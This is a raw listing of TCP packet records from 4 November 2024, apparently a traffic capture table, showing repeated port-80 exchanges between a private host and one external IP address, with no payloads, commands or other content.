                                                              Nov 4, 2024 09:27:58.523556948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523571968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523582935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523595095 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523611069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523617983 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523647070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523693085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523703098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523714066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523722887 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523729086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523741007 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523751974 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523777962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523817062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523828030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523838043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523850918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523857117 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523871899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523874044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523888111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523895025 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523916006 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523930073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.523955107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523964882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523976088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.523993969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524003029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524003983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524019957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524028063 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524038076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524038076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524070024 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524079084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524173975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524184942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524198055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524208069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524221897 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524233103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524249077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524252892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524262905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524271011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524298906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524311066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524317980 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524339914 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524358988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524369001 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524374008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524386883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524399996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524406910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524414062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524434090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524454117 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524478912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524559021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524571896 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524583101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524593115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524601936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524615049 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524622917 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524641991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524693966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524705887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524717093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524727106 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524758101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524813890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524825096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524836063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524847031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524853945 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524863005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524871111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524878025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.524903059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524913073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.524998903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.525011063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.525027037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.525041103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.525047064 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.525079012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540605068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540620089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540632010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540685892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540698051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540698051 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540714025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540719986 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540759087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540795088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540805101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540816069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540827036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540839911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540847063 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540852070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540855885 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540868998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540877104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540879965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540905952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540910959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540926933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540952921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.540968895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540980101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.540992022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541012049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541043043 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541095972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541106939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541119099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541130066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541138887 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541141987 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541166067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541182995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541196108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541208029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541218996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541245937 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541265011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541323900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541336060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541347980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541364908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541368008 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541392088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541424036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541426897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541440010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541450024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541457891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541460991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541481018 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541491985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541553020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541568041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541578054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541590929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541596889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541616917 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541646004 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541665077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541676044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541687965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541701078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541708946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541718960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541738033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541752100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541783094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541799068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541810036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541819096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541822910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541836023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541841984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541847944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541867971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541884899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.541965008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541975975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.541986942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542009115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542032003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542107105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542118073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542129040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542149067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542171955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542193890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542205095 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542217016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542229891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542237997 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542246103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542259932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542267084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542285919 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542314053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542325974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542347908 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542375088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542390108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542402029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542433023 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542462111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542473078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542498112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542500973 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542520046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542534113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542601109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542612076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542623043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.542634964 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542648077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.542664051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543595076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543622971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543632984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543646097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543663025 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543723106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543739080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543752909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543766022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543776035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543804884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543806076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543836117 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543855906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543868065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543880939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543891907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543901920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543922901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543922901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543935061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.543958902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543970108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543997049 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.543999910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544009924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544029951 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544056892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544101954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544112921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544123888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544142962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544174910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544209957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544220924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544231892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544244051 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544255972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544264078 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544295073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544337034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544348955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544359922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544380903 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544401884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544426918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544440031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544450998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544461966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544486046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544516087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544537067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544553041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544562101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544575930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.544595957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.544617891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.545725107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545768023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545780897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545825958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.545866013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545877934 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545888901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545902014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545908928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.545938969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.545957088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545969009 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.545979977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546000957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546013117 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546082973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546093941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546106100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546117067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546125889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546129942 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546145916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546163082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546169996 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546176910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546180010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546199083 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546226978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546261072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546272039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546283960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546293974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546297073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546312094 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546333075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546386957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546400070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546411991 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546422958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546423912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546437979 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546437979 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.546458960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.546489954 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.576672077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.576828957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.576841116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.576939106 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.620384932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.620399952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.620410919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.620424032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.620438099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.620510101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.620553970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.639868975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.639930010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.639941931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.639955044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.639969110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.639980078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640007019 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640041113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640043020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640079021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640114069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640126944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640157938 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640177965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640189886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640208006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640212059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640230894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640239000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640289068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640304089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640316963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640337944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640363932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.640366077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.640377998 CET804993289.40.31.232192.168.2.7
